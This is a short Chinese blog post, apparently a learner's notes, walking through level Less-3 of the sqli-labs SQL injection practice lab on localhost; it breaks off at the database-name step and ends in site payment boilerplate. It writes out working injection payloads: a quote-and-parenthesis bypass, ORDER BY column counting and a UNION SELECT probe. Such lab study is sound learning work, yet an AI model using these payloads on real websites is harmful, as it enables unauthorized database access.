从零记录sqli-labs学习过程 sqli-labs Less-3

本文记录了在sqli-labs的Less-3关卡中,通过观察报错信息和尝试在参数id后添加符号来执行SQL注入的基本流程,详细描述了解决此关的关键步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

sqli-labs Less-3

在这里插入图片描述

第三关界面,参数id

在这里插入图片描述

http://localhost/sqli-labs/Less-3/index.php?id=1'

看一下报错信息 check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1'

尝试在后面加上)

http://localhost/sqli-labs/Less-3/index.php?id=1') --+

在这里插入图片描述

没什么问题就像之前几关一样进入基本流程,截图省略

判断字段数:
http://localhost/sqli-labs/Less-3/index.php?id=1') order by 3 --+

判断回显位:
http://localhost/sqli-labs/Less-3/index.php?id=-1') union select 1,2,3 --+

获取当前数据库名称:
http://localhost/sqli-labs/
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值